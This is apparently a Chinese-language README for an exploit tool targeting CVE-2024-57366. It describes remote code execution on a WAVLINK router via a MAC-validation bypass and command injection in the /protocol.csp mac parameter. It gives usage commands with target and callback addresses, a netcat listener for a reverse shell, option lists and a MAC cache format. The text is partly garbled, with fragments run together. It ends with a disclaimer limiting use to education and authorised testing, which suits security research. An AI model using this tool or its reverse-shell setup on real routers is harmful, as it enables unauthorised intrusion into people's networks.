一个针对CVE-2024-57366的强大漏洞利用程序,通过绕过MAC地址验证和命令注入,在易受攻击的路由器上实现远程代码执行。
这是一个后授权漏洞利用,需要路由器开启“远程控制”功能以及管理员密码。管理用户名硬编码为“admin”。
sudo 权限(网络接口管理所需)pip3 install requests
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# 脚本会询问:“是否使用缓存的MAC进行快速利用?(y/n):” - 回答“y”
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123 --force-full
python3 exploit.py --list-cached
--target - 目标路由器IP地址(默认:127.0.0.1)--port - 目标路由器端口(默认:80)--local-ip - 本地IP地址,用于反连shell回调--local-port - 本地端口,用于反连shell回调(默认:4444)--password - 路由器管理员密码--ssid - WiFi网络名称(默认:WAVLINK-Mesh_DC4B)--force-full - 强制完整漏洞利用,跳过缓存的MAC检查--list-cached - 列出缓存的MAC地址并退出CVE-2024-57366 利用路由器固件中的MAC地址验证绕过漏洞。该漏洞允许通过 /protocol.csp 端点中的 mac 参数进行命令注入。
eth0 接口保留原始网络环境index=1,令牌在URL路径中)漏洞利用程序自动将成功的MAC地址缓存到 successful_macs.txt:
# CVE-2024-57366 Successful MAC Addresses
# Format: MAC_ADDRESS TARGET_IP TIMESTAMP
# You can manually add entries here
32:98:A2:A8:5F:5F 192.168.1.187 1758305048.0 # 2025-09-19 14:44:08
手动添加MAC:编辑 successful_macs.txt 并添加类似行:
AA:BB:CC:DD:EE:FF 192.168.1.100 1758305048.0 # 2025-09-19 14:44:08
# Start netcat listener
nc -lvp 4444
# Run exploit
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# When prompted to save MAC address, say "y"
# Start netcat listener
nc -lvp 4444
# Run exploit (will use cached MAC)
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# 当提示是否使用缓存的MAC时,回答“y”
“未找到无线网卡”
sudo 运行“MAC地址验证失败”
“请求超时”
“反连shell未连接”
--local-ip 是否正确(使用 ip addr show eth0)CVE-2024-57366/
├── exploit.py # Main exploit script
├── successful_macs.txt # MAC address cache (auto-generated)
└── README.md # This file
此工具仅用于教育和授权测试目的。仅在你拥有或获得明确测试许可的系统上使用。作者不对任何滥用此工具的行为负责。
/protocol.csp 端点进行命令注入本项目按原样提供,仅供教育目的。请负责任地使用,并遵守适用的法律法规。